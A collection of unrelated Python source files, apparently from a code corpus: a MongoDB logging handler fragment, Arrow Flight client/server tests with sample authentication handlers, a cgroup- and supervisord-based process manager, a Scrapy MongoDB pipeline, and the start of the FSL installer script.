"msg",
"message",
"exc_info",
"funcName",
"relativeCreated",
"levelname",
"asctime",
}
def __init__(self, log_model, max_thread=2, *args):
super(ThreadMongoHandler, self).__init__(*args)
assert issubclass(log_model, BaseLog), "log_model must be a subclass of BaseLog"
assert 0 < max_thread < 6, "thread is not efficient enough, must be 1~5 threads"
self.log_cls = log_model
log_model.ensure_index(
"#ip"
) # prevent bug: non-thread safe mongoengine collection creation
self.q = Queue()
self._r = 1
thread_pool = self.tp = set()
while len(thread_pool) < max_thread:
process = Thread(target=self.record)
process.setDaemon(True)
thread_pool.add(process)
for p in thread_pool:
p.start()
@staticmethod
def _write(msg=None):
if msg is None:
msg = traceback.format_exc()
try:
sys.stderr.write(
"{0}: {1}".format(datetime.now().strftime(LOG_DATEFORMAT), msg)
)
except Exception:
pass
def handle(self, record):
rv = self.filter(record)
if rv:
self.emit(record)
return rv
def emit(self, record):
try:
self.format(record)
msg = {}
for k, v in record.__dict__.items():
if isinstance(v, (str, int, float)):
msg[k] = v
self.q.put_nowait(msg)
except Exception:
self.handleError(record)
def close(self):
self._r = 0
for p in self.tp:
p.join()
self._write("exit with %d logs remained\n" % self.q.qsize())
def record(self):
while self._r:
try:
msg = self.q.get(timeout=2)
except Empty:
continue
except SystemExit:
raise
except Exception:
self._write()
continue
log = self.log_cls(
ip=INNER_IP,
pid=msg["process"],
level=msg["levelno"],
msg=msg["message"],
time=msg["asctime"],
)
for k, v in msg.items():
if k not in self.RECORD_FIELDS:
setattr(log, k, v)
try:
log.save()
except AssertionError:
self._write()
except Exception:
# this supposed to be resolved
self._write()
|
test_flight.py
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import base64
import contextlib
import socket
import threading
import time
import pytest
import pyarrow as pa
from pyarrow.compat import tobytes
flight = pytest.importorskip("pyarrow.flight")
def simple_ints_table():
data = [
pa.array([-10, -5, 0, 5, 10])
]
return pa.Table.from_arrays(data, names=['some_ints'])
def simple_dicts_table():
dict_values = pa.array(["foo", "baz", "quux"], type=pa.utf8())
data = [
pa.chunked_array([
pa.DictionaryArray.from_arrays([1, 0, None], dict_values),
pa.DictionaryArray.from_arrays([2, 1], dict_values)]),
]
return pa.Table.from_arrays(data, names=['some_dicts'])
class ConstantFlightServer(flight.FlightServerBase):
"""A Flight server that always returns the same data.
See ARROW-4796: this server implementation will segfault if Flight
does not properly hold a reference to the Table object.
"""
def __init__(self):
super(ConstantFlightServer, self).__init__()
# Ticket -> Table
self.table_factories = {
b'ints': simple_ints_table,
b'dicts': simple_dicts_table,
}
def do_get(self, context, ticket):
# Return a fresh table, so that Flight is the only one keeping a
# reference.
table = self.table_factories[ticket.ticket]()
return flight.RecordBatchStream(table)
class EchoFlightServer(flight.FlightServerBase):
"""A Flight server that returns the last data uploaded."""
def __init__(self):
super(EchoFlightServer, self).__init__()
self.last_message = None
def do_get(self, context, ticket):
return flight.RecordBatchStream(self.last_message)
def do_put(self, context, descriptor, reader):
self.last_message = reader.read_all()
class EchoStreamFlightServer(EchoFlightServer):
"""An echo server that streams individual record batches."""
def do_get(self, context, ticket):
return flight.GeneratorStream(
self.last_message.schema,
self.last_message.to_batches(chunksize=1024))
def list_actions(self, context):
return []
def do_action(self, context, action):
if action.type == "who-am-i":
return iter([flight.Result(context.peer_identity())])
raise NotImplementedError
class InvalidStreamFlightServer(flight.FlightServerBase):
"""A Flight server that tries to return messages with differing schemas."""
schema = pa.schema([('a', pa.int32())])
def do_get(self, context, ticket):
data1 = [pa.array([-10, -5, 0, 5, 10], type=pa.int32())]
data2 = [pa.array([-10.0, -5.0, 0.0, 5.0, 10.0], type=pa.float64())]
assert data1.type != data2.type
table1 = pa.Table.from_arrays(data1, names=['a'])
table2 = pa.Table.from_arrays(data2, names=['a'])
assert table1.schema == self.schema
return flight.GeneratorStream(self.schema, [table1, table2])
class SlowFlightServer(flight.FlightServerBase):
"""A Flight server that delays its responses to test timeouts."""
def do_action(self, context, action):
time.sleep(0.5)
return iter([])
class HttpBasicServerAuthHandler(flight.ServerAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
pass
def is_valid(self, token):
if not token:
raise ValueError("unauthenticated: token not provided")
token = base64.b64decode(token)
username, password = token.split(b':')
if username not in self.creds:
raise ValueError("unknown user")
if self.creds[username] != password:
raise ValueError("wrong password")
return username
class HttpBasicClientAuthHandler(flight.ClientAuthHandler):
"""An example implementation of HTTP basic authentication."""
def __init__(self, username, password):
super().__init__()
self.username = tobytes(username)
self.password = tobytes(password)
def authenticate(self, outgoing, incoming):
pass
def get_token(self):
return base64.b64encode(self.username + b':' + self.password)
class TokenServerAuthHandler(flight.ServerAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, creds):
super().__init__()
self.creds = creds
def authenticate(self, outgoing, incoming):
username = incoming.read()
password = incoming.read()
if username in self.creds and self.creds[username] == password:
outgoing.write(base64.b64encode(b'secret:' + username))
else:
raise ValueError("unauthenticated: invalid username/password")
def is_valid(self, token):
token = base64.b64decode(token)
if not token.startswith(b'secret:'):
raise ValueError("unauthenticated: invalid token")
return token[7:]
class TokenClientAuthHandler(flight.ClientAuthHandler):
"""An example implementation of authentication via handshake."""
def __init__(self, username, password):
super().__init__()
self.username = username
self.password = password
self.token = b''
def authenticate(self, outgoing, incoming):
outgoing.write(self.username)
outgoing.write(self.password)
self.token = incoming.read()
def get_token(self):
return self.token
@contextlib.contextmanager
def flight_server(server_base, *args, **kwargs):
"""Spawn a Flight server on a free port, shutting it down when done."""
# Find a free port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with contextlib.closing(sock) as sock:
sock.bind(('', 0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = sock.getsockname()[1]
auth_handler = kwargs.get('auth_handler')
ctor_kwargs = kwargs
if auth_handler:
del ctor_kwargs['auth_handler']
server_instance = server_base(*args, **ctor_kwargs)
def _server_thread():
server_instance.run(port, auth_handler=auth_handler)
thread = threading.Thread(target=_server_thread, daemon=True)
thread.start()
yield port
server_instance.shutdown()
thread.join()
def test_flight_do_get_ints():
"""Try a simple do_get call."""
table = simple_ints_table()
with flight_server(ConstantFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
data = client.do_get(flight.Ticket(b'ints')).read_all()
assert data.equals(table)
def test_flight_do_get_dicts():
table = simple_dicts_table()
with flight_server(ConstantFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
data = client.do_get(flight.Ticket(b'dicts')).read_all()
assert data.equals(table)
@pytest.mark.slow
def test_flight_large_message():
"""Try sending/receiving a large message via Flight.
See ARROW-4421: by default, gRPC won't allow us to send messages >
4MiB in size.
"""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024 * 1024))
], names=['a'])
with flight_server(EchoFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
writer = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
# Write a single giant chunk
writer.write_table(data, 10 * 1024 * 1024)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_generator_stream():
"""Try downloading a flight of RecordBatches in a GeneratorStream."""
data = pa.Table.from_arrays([
pa.array(range(0, 10 * 1024))
], names=['a'])
with flight_server(EchoStreamFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
writer = client.do_put(flight.FlightDescriptor.for_path('test'),
data.schema)
writer.write_table(data)
writer.close()
result = client.do_get(flight.Ticket(b'')).read_all()
assert result.equals(data)
def test_flight_invalid_generator_stream():
"""Try streaming data with mismatched schemas."""
with flight_server(InvalidStreamFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
with pytest.raises(pa.ArrowException):
client.do_get(flight.Ticket(b'')).read_all()
def test_timeout_fires():
"""Make sure timeouts fire on slow requests."""
# Do this in a separate thread so that if it fails, we don't hang
# the entire test process
with flight_server(SlowFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("", b"")
options = flight.FlightCallOptions(timeout=0.2)
with pytest.raises(pa.ArrowIOError, match="Deadline Exceeded"):
list(client.do_action(action, options=options))
def test_timeout_passes():
"""Make sure timeouts do not fire on fast requests."""
with flight_server(ConstantFlightServer) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
options = flight.FlightCallOptions(timeout=0.2)
client.do_get(flight.Ticket(b'ints'), options=options).read_all()
basic_auth_handler = HttpBasicServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
token_auth_handler = TokenServerAuthHandler(creds={
b"test": b"p4ssw0rd",
})
def test_http_basic_unauth():
"""Test that auth fails when not authenticated."""
with flight_server(EchoStreamFlightServer,
auth_handler=basic_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("who-am-i", b"")
with pytest.raises(pa.ArrowException, match=".*unauthenticated.*"):
list(client.do_action(action))
def test_http_basic_auth():
"""Test a Python implementation of HTTP basic authentication."""
with flight_server(EchoStreamFlightServer,
auth_handler=basic_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_http_basic_auth_invalid_password():
"""Test that auth fails with the wrong password."""
with flight_server(EchoStreamFlightServer,
auth_handler=basic_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("who-am-i", b"")
client.authenticate(HttpBasicClientAuthHandler('test', 'wrong'))
with pytest.raises(pa.ArrowException, match=".*wrong password.*"):
next(client.do_action(action))
def test_token_auth():
"""Test an auth mechanism that uses a handshake."""
with flight_server(EchoStreamFlightServer,
auth_handler=token_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
action = flight.Action("who-am-i", b"")
client.authenticate(TokenClientAuthHandler('test', 'p4ssw0rd'))
identity = next(client.do_action(action))
assert identity.body.to_pybytes() == b'test'
def test_token_auth_invalid():
"""Test an auth mechanism that uses a handshake."""
with flight_server(EchoStreamFlightServer,
auth_handler=token_auth_handler) as server_port:
client = flight.FlightClient.connect('localhost', server_port)
with pytest.raises(pa.ArrowException, match=".*unauthenticated.*"):
client.authenticate(TokenClientAuthHandler('test', 'wrong'))
|
rundev.py
|
#!/usr/bin/python3
# Helpers to manager spawned processes.
# In development, provides one stream listing all events.
# In production, forwards process managements to supervisord.
import argparse, os, tempfile, socket, json, fcntl, contextlib, subprocess, pipes, queue, atexit, threading, signal, sys, glob, pty, time, pwd
# ---------- Common -----------
def clear_env():
env = {}
for name in ['HOME', 'USER', 'LOGNAME']:
if name in os.environ:
env[name] = os.environ[name]
env['LANG'] = 'en_US.UTF-8'
env['PATH'] = '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
os.environ.clear()
os.environ.update(env)
def parse_env(env):
d = {}
for item in (env or []):
value = item.split('=', 1)
if len(value) == 1:
value = (value[0], os.environ[value[0]])
d[value[0]] = value[1]
return d
# --------- Devel -----------
CG = None
def setup_cg():
global CG
CG = '/sys/fs/cgroup/cpu'
if os.path.exists(CG + '/lxc/') and len(os.listdir(CG)) == 1:
# We are running inside LXC
CG = glob.glob(CG + '/lxc/*')[0]
CG += '/rundev'
if not os.access(CG + '/tasks', os.O_RDWR):
print('Creating cgroup %r for %d...'
% (CG, os.getuid()))
subprocess.check_call(['sudo', 'mkdir', CG])
subprocess.check_call(['sudo', 'chown', str(os.getuid()), CG])
def add_to_cg():
# Sometimes LXCFS (or cgroupfs?) perpetually returns 0 from os.write, hanging file.write function. We workaround this bug (?) by reopening FD.
for i in range(30):
with open(CG + '/tasks', 'a') as f:
s = (str(os.getpid()) + '\n').encode()
result = os.write(f.fileno(), s)
if result == len(s):
return
raise OSError('could not add task to cgroup (returned %d)' % result)
class PtyPopen():
# Runs children in a new PTY.
def __init__(self, args, environ, chdir):
self.args = args
self.environ = environ
self.chdir = chdir
pid, master = pty.fork()
if pid == 0:
add_to_cg()
try:
self._child()
except:
traceback.print_exc()
finally:
os._exit(0)
else:
self.pid = pid
self.stdout = os.fdopen(master, 'rb', 0)
def _child(self):
for k, v in self.environ:
os.environ[k] = v
if self.chdir:
os.chdir(self.chdir)
os.execvp(self.args[0], self.args)
def kill_cg():
for i in range(5):
try:
tasks = open(CG + '/tasks').read().split()
except OSError:
return
tasks = [ pid for pid in tasks
if int(pid) != os.getpid() ]
print('[Killing tasks: %s]' % ' '.join(tasks))
if i == 0:
sig = 15
else:
sig = 9
if not tasks: break
subprocess.call(['sudo', 'kill', '-%d' % sig] + tasks)
time.sleep(0.3)
class colors:
gray = '\033[37m'
red = '\033[31m'
bg_red = '\033[101m'
reset = '\033[0m'
class DevServer():
def __init__(self):
self.output_queue = queue.Queue(100)
self.children = {}
def child(self, sock):
info = json.loads(sock.makefile().readline())
name = info['name']
if info['subname']:
name = info['subname'] + '/' + name
if name in self.children:
sock.sendall(b'A') # confirmation
self.output_queue.put((name, 'child already running'))
return
child = PtyPopen(info['command'], environ=info['env'],
chdir=info['chdir'])
self.children[name] = child
if name != '_initial':
msg = ('started: %s\n' % ' '.join(map(str, info['command'])))
self.output_queue.put((name, msg.encode('utf8')))
sock.sendall(b'A') # confirmation
while True:
try:
line = child.stdout.readline()
except OSError:
break
if not line:
break
self.output_queue.put((name, line))
_, status = os.waitpid(child.pid, 0)
exit_info = ('exited with status %d' % status) if info['oneshot'] else (colors.bg_red + '!!! PROCESS EXITED !!!' + colors.reset)
del self.children[name]
self.output_queue.put((name, exit_info.encode() + b'\n'))
def finish(self):
kill_cg()
os._exit(0)
def output_handler(self):
max_name_length = 10
while True:
name, line = self.output_queue.get()
max_name_length = max(max_name_length, len(name))
sys.stdout.buffer.write(((colors.gray + '[%s] ' + colors.reset) % (name.ljust(max_name_length))).encode())
sys.stdout.buffer.write(line)
sys.stdout.buffer.write(colors.reset.encode())
sys.stdout.buffer.flush()
if len(self.children) == 0 and self.output_queue.qsize() == 0:
print('No more running processes, exiting.')
self.finish()
def main(self, command, env):
setup_cg()
tmp_dir = tempfile.mkdtemp()
socket_path = tmp_dir + '/rundev.socket'
sock = socket.socket(socket.AF_UNIX)
sock.bind(socket_path)
sock.listen(5)
clear_env()
os.environ['RUNDEV_SOCKET'] = socket_path
os.environ.update(parse_env(env))
if os.environ.get('EXTPATH'):
os.environ['PATH'] = os.environ['EXTPATH'] + ':' + os.environ['PATH']
atexit.register(os.rmdir, tmp_dir)
atexit.register(os.unlink, socket_path)
threading.Thread(target=add, kwargs={
'name': '_initial',
'command': command,
'oneshot': True
}).start()
threading.Thread(target=self.output_handler).start()
signal.signal(signal.SIGINT, lambda *_: self.finish())
while True:
child, addr = sock.accept()
threading.Thread(target=self.child, args=[child]).start()
# --------- Production -----------
runtime_dir = None
def check_runtime_dir(create=False):
global runtime_dir
subname = os.environ.get('RUNDEV_SUBNAME', 'rundev')
link = os.path.expanduser('~/.config/%s' % subname)
if not os.path.exists(os.path.dirname(link)):
os.mkdir(os.path.dirname(link))
if not os.path.exists(link):
if not create:
raise Exception('supervisord not yet running (use `rundev init`)')
try:
os.unlink(link)
except OSError:
pass
dirname = tempfile.mkdtemp()
os.symlink(dirname, link)
runtime_dir = os.readlink(link)
@contextlib.contextmanager
def lock():
with open(runtime_dir + '/lock', 'w') as f:
fcntl.flock(f, fcntl.LOCK_EX)
yield
def which(path, program):
fpath, fname = os.path.split(program)
if fpath:
return program
else:
for path in path.split(':'):
path = path.strip('"')
if not path: continue
exe_file = os.path.join(path, program)
if os.path.isfile(exe_file):
return exe_file
return program
def create_supervisor_config():
with open(runtime_dir + '/processes.json', 'r') as f:
info = json.loads(f.read())
config = '''
[supervisord]
childlogdir={logdir}
[unix_http_server]
file={runtime_dir}/supervisord.sock
chmod=0700
[rpcinterface:supervisor]
supervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface
[supervisorctl]
serverurl=unix://{runtime_dir}/supervisord.sock
'''.format(runtime_dir=runtime_dir, logdir=info['logdir'])
def supervisor_quote(s):
return pipes.quote(s).replace('%', '%%')
for process in info['processes'].values():
environ = dict(info['env'])
environ.update(process['env'])
command = list(process['command'])
path = os.environ['PATH']
if environ.get('EXTPATH'):
path = environ['EXTPATH'] + ':' + path
command[0] = which(path, command[0]) # supervisord doesn't handle PATH properly
config += '''
[program:{name}]
command={command}
redirect_stderr=True
'''.format(name=process['name'],
command=' '.join(map(supervisor_quote, command)))
if process['oneshot']:
config += 'startsecs=0\nautorestart=false\n'
if process['chdir']:
config += 'directory=%s\n' % supervisor_quote(process['chdir'])
for k, v in environ.items():
config += 'environment=%s=%s\n' % (supervisor_quote(k), supervisor_quote(v))
if 'EXTPATH' in environ:
config += 'environment=PATH=%s\n' % supervisor_quote(path)
if process.get('user'):
config += 'user=%s\n' % supervisor_quote(process['user'])
config += 'environment=HOME=%s\n' % supervisor_quote(pwd.getpwnam(process['user']).pw_dir)
with open(runtime_dir + '/supervisord.conf', 'w') as f:
f.write(config)
def save_process(process_info):
with open(runtime_dir + '/processes.json', 'r') as f:
info = json.loads(f.read())
info['processes'][process_info['name']] = process_info
with open(runtime_dir + '/processes.json', 'w') as f:
f.write(json.dumps(info, indent=2))
def start_supervisor():
if not os.path.exists(runtime_dir + '/supervisord.sock'):
create_supervisor_config()
subprocess.check_call(['supervisord', '-c', runtime_dir + '/supervisord.conf'])
def add_process(info):
check_runtime_dir(create=False)
with lock():
save_process(info)
ctl = ['supervisorctl', '-c', runtime_dir + '/supervisord.conf']
create_supervisor_config()
subprocess.check_call(ctl + ['reread'])
subprocess.check_call(ctl + ['update'])
def run_ctl(command):
check_runtime_dir(create=False)
cmd = ['supervisorctl', '-c', runtime_dir + '/supervisord.conf'] + command
os.execvp(cmd[0], cmd)
def init_production(logdir, env):
check_runtime_dir(create=True)
if not logdir:
logdir = os.path.expanduser('~/.logs')
try:
os.mkdir(logdir)
except OSError:
pass
with lock():
with open(runtime_dir + '/processes.json', 'w') as f:
f.write(json.dumps({
'processes': {},
'env': parse_env(env),
'logdir': logdir
}))
start_supervisor()
# ---------- Commands -------------
def add(name, command, env={}, user=None, oneshot=False, chdir=None):
info = {
'name': name,
'command': command,
'env': env,
'chdir': chdir,
'oneshot': oneshot,
'user': user,
}
if 'RUNDEV_SOCKET' in os.environ:
# development, send arguments to development console
sock = socket.socket(socket.AF_UNIX)
info['subname'] = os.environ.get('RUNDEV_SUBNAME')
sock.connect(os.environ['RUNDEV_SOCKET'])
sock.sendall((json.dumps(info) + '\n').encode())
sock.recv(1)
sock.close()
else:
add_process(info)
def main():
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(dest='action')
subparser = subparsers.add_parser(
'dev',
help='Runs process inside development console.')
subparser.add_argument('command', nargs='+')
subparser.add_argument('--env', action='append')
subparser = subparsers.add_parser(
'init',
help='Initializes production environment.')
subparser.add_argument('--logdir')
subparser.add_argument('--env', action='append')
subparser.add_argument('command', nargs='*')
subparser = subparsers.add_parser(
'ctl',
help='Runs supervisorctl.')
subparser.add_argument('command', nargs='*')
subparser = subparsers.add_parser(
'add',
help='Adds or updates and spawns a new process.')
subparser.add_argument('name',
help='Process name.')
subparser.add_argument('command',
nargs='+',
help='Command to run')
subparser.add_argument('--oneshot',
action='store_true',
help='Is it normal for this process to exit?')
subparser.add_argument('--user',
help='Change user before executing')
ns = parser.parse_args()
if ns.action == 'dev':
DevServer().main(ns.command, ns.env)
elif ns.action == 'ctl':
run_ctl(ns.command)
elif ns.action == 'init':
init_production(logdir=ns.logdir, env=ns.env)
if ns.command:
os.execvp(ns.command[0], ns.command)
elif ns.action == 'add':
add(ns.name, ns.command, oneshot=ns.oneshot, user=ns.user)
else:
parser.print_usage()
if __name__ == '__main__':
main()
|
pipelines.py
|
import asyncio
import os
import queue
import threading
import time
from collections import defaultdict
from dataclasses import asdict
from typing import Optional
import pymongo
from loguru import logger
from pymongo import ASCENDING, IndexModel
from . import items
def _get_mongo_uri() -> str:
with open(os.environ.get("DRAGON_TALON_DB_USERNAME_FILE"), "rt") as fs:
username = fs.read().strip()
with open(os.environ.get("DRAGON_TALON_DB_PASSWORD_FILE"), "rt") as fs:
password = fs.read().strip()
return f"mongodb://{username}:{password}@mongodb:27017"
class MongoPipeline:
_QUEUE_SENTINEL = None
def __init__(self, spider_name: str):
self._mongo_uri = _get_mongo_uri()
self._spider_name = spider_name
self._mongo_cli = pymongo.MongoClient(self._mongo_uri, tz_aware=True)
self._db_inst = self._mongo_cli.get_database("scrapy")
self._init_collections(spider_name)
self._item_queue = queue.Queue(maxsize=1000)
self._consume_thread = threading.Thread(target=self._consume_items, daemon=True)
def _init_collections(self, spider_name: str):
if spider_name == "lianjia":
xiaoqu_info_col = self._db_inst.get_collection(items.XiaoquInfo.item_name)
index1 = IndexModel([("xiaoqu_id", ASCENDING)], unique=True)
index2 = IndexModel([("district", ASCENDING), ("area", ASCENDING)])
xiaoqu_info_col.create_indexes([index1, index2])
xiaoqu_daily_stats_col = self._db_inst.get_collection(items.XiaoquDailyStats.item_name)
index1 = IndexModel([("date_", ASCENDING), ("xiaoqu_id", ASCENDING)], unique=True)
xiaoqu_daily_stats_col.create_indexes([index1])
transaction_col = self._db_inst.get_collection(items.Transaction.item_name)
index1 = IndexModel([("date_", ASCENDING), ("house_id", ASCENDING)], unique=True)
index2 = IndexModel([("xiaoqu_id", ASCENDING), ("date_", ASCENDING)])
transaction_col.create_indexes([index1, index2])
forsale_col = self._db_inst.get_collection(items.Transaction.item_name)
index1 = IndexModel([("date_", ASCENDING), ("house_id", ASCENDING)], unique=True)
index2 = IndexModel([("xiaoqu_id", ASCENDING), ("date_", ASCENDING)])
forsale_col.create_indexes([index1, index2])
else:
raise RuntimeError(f"unexpected spider name {self._spider_name}")
@classmethod
def from_crawler(cls, crawler):
return cls(crawler.spider.name)
def open_spider(self, spider):
self._consume_thread.start()
def close_spider(self, spider):
self._item_queue.put(self._QUEUE_SENTINEL)
self._consume_thread.join()
def process_item(self, item, spider):
self._item_queue.put(item)
def _consume_items(self):
while True:
try:
self._consume_all_items_in_queue()
except StopIteration:
break
time.sleep(5)
def _consume_all_items_in_queue(self):
find_sentinel = False
col2items = defaultdict(list)
while not self._item_queue.empty():
item = self._item_queue.get_nowait()
if item == self._QUEUE_SENTINEL:
find_sentinel = True
break
col2items[item.item_name].append(asdict(item))
for colname, items2insert in col2items.items():
collection = self._db_inst.get_collection(colname)
try:
collection.insert_many(items2insert, ordered=False, bypass_document_validation=True)
except pymongo.errors.BulkWriteError as exc:
# ignore duplicate exception
exc_list = [error for error in exc.details["writeErrors"] if error["code"] != 11000]
if exc_list:
logger.error(f"col {colname}: insertion error {exc_list}")
failed = len(exc_list)
inserted = len(items2insert) - failed
logger.info(f"col {colname}: {inserted} items inserted, {failed} items failed")
else:
logger.info(f"col {colname}: {len(items2insert)} items inserted")
if find_sentinel:
raise StopIteration
|
fslinstaller.py
|
#!/usr/bin/python
# Handle unicode encoding
import collections
import csv
import errno
import getpass
import itertools
import locale
import os
import platform
import threading
import time
import shlex
import socket
import sys
import tempfile
import urllib2
import re
import fileinput
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from re import compile, escape, sub
from subprocess import Popen, call, PIPE, STDOUT
try:
from subprocess import DEVNULL # py3k
except ImportError:
DEVNULL = open(os.devnull, 'wb')
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
try:
import json
HAS_JSON = True
except Exception:
HAS_JSON = False
fsli_C_FAILED = 1
fsli_C_OK = 2
fsli_C_SKIP = 4
fsli_C_WARN = 3
CURRENT = 0
UPDATE = 1
UPGRADE = 2
BOURNE_SHELLS = ('sh', 'bash', 'zsh', 'ksh', 'dash', )
C_SHELLS = ('csh', 'tcsh', )
class Version(object):
def __init__(self, version_string):
if ':' in version_string:
version_string = version_string.split(':')[0]
v_vals = version_string.split('.')
for v in v_vals:
if not v.isdigit():
raise ValueError('Bad version string')
self.major = int(v_vals[0])
try:
self.minor = int(v_vals[1])
except IndexError:
self.minor = 0
try:
self.patch = int(v_vals[2])
except IndexError:
self.patch = 0
try:
self.hotfix = int(v_vals[3])
except IndexError:
self.hotfix = 0
def __repr__(self):
return "Version(%s,%s,%s,%s)" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __str__(self):
if self.hotfix == 0:
return "%s.%s.%s" % (self.major, self.minor, self.patch)
else:
return "%s.%s.%s.%s" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __ge__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self > other or self == other:
return True
return False
def __le__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self < other or self == other:
return True
return False
def __cmp__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__lt__(other):
return -1
if self.__gt__(other):
return 1
return 0
def __lt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major < other.major:
return True
if self.major > other.major:
return False
if self.minor < other.minor:
return True
if self.minor > other.minor:
return False
if self.patch < other.patch:
return True
if self.patch > other.patch:
return False
if self.hotfix < other.hotfix:
return True
if self.hotfix > other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __gt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major > other.major:
return True
if self.major < other.major:
return False
if self.minor > other.minor:
return True
if self.minor < other.minor:
return False
if self.patch > other.patch:
return True
if self.patch < other.patch:
return False
if self.hotfix > other.hotfix:
return True
if self.hotfix < other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __eq__(self, other):
if not isinstance(other, Version):
return NotImplemented
if (
self.major == other.major and
self.minor == other.minor and
self.patch == other.patch and
self.hotfix == other.hotfix):
return True
return False
def __ne__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__eq__(other):
return False
return True
version = Version('3.1.0')
def memoize(f):
cache = f.cache = {}
def g(*args, **kwargs):
key = (f, tuple(args), frozenset(kwargs.items()))
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
class InstallError(Exception):
pass
class shell_colours(object):
default = '\033[0m'
rfg_kbg = '\033[91m'
gfg_kbg = '\033[92m'
yfg_kbg = '\033[93m'
mfg_kbg = '\033[95m'
yfg_bbg = '\033[104;93m'
bfg_kbg = '\033[34m'
bold = '\033[1m'
class MsgUser(object):
__debug = False
__quiet = False
@classmethod
def debugOn(cls):
cls.__debug = True
@classmethod
def debugOff(cls):
cls.__debug = False
@classmethod
def quietOn(cls):
cls.__quiet = True
@classmethod
def quietOff(cls):
cls.__quiet = False
@classmethod
def isquiet(cls):
return cls.__quiet
@classmethod
def isdebug(cls):
return cls.__debug
@classmethod
def debug(cls, message, newline=True):
if cls.__debug:
mess = str(message)
if newline:
mess += "\n"
sys.stderr.write(mess)
@classmethod
def message(cls, msg):
if cls.__quiet:
return
print msg
@classmethod
def question(cls, msg):
print msg,
@classmethod
def skipped(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.mfg_kbg, "[Skipped] ", shell_colours.default, msg))
@classmethod
def ok(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.gfg_kbg, "[OK] ", shell_colours.default, msg))
@classmethod
def failed(cls, msg):
print "".join(
(shell_colours.rfg_kbg, "[FAILED] ", shell_colours.default, msg))
@classmethod
def warning(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.bfg_kbg,
shell_colours.bold,
"[Warning]",
shell_colours.default, " ", msg))
class Progress_bar(object):
def __init__(self, x=0, y=0, mx=1, numeric=False, percentage=False):
self.x = x
self.y = y
self.width = 50
self.current = 0
self.max = mx
self.numeric = numeric
self.percentage = percentage
def update(self, reading):
if MsgUser.isquiet():
return
percent = int(round(reading * 100.0 / self.max))
cr = '\r'
if not self.numeric and not self.percentage:
bar = '#' * int(percent)
elif self.numeric:
bar = "/".join(
(str(reading),
str(self.max))) + ' - ' + str(percent) + "%\033[K"
elif self.percentage:
bar = "%s%%" % (percent)
sys.stdout.write(cr)
sys.stdout.write(bar)
sys.stdout.flush()
self.current = percent
if percent == 100:
sys.stdout.write(cr)
if not self.numeric and not self.percentage:
sys.stdout.write(" " * int(percent))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.numeric:
sys.stdout.write(" " * (len(str(self.max))*2 + 8))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.percentage:
sys.stdout.write("100%")
sys.stdout.write(cr)
sys.stdout.flush()
def temp_file_name(mode='r', close=False):
'''Return a name for a temporary file - uses mkstemp to create the file and
returns a tuple (file object, file name).
Opens as read-only unless mode specifies otherwise. If close is set to True
will close the file before returning.
The file object is a fdopen file object so lacks a useable file name.'''
(tmpfile, fname) = tempfile.mkstemp()
file_obj = os.fdopen(tmpfile, mode)
if close:
file_obj.close()
return (file_obj, fname)
class RunCommandError(Exception):
pass
class Spinner(object):
spinner = itertools.cycle(('-', '\\', '|', '/', ))
busy = False
delay = 0.2
def __init__(self, delay=None, quiet=False):
if delay:
try:
self.delay = float(delay)
except ValueError:
pass
self.quiet = quiet
def spin_it(self):
while self.busy:
sys.stdout.write(self.spinner.next())
sys.stdout.flush()
time.sleep(self.delay)
sys.stdout.write('\b')
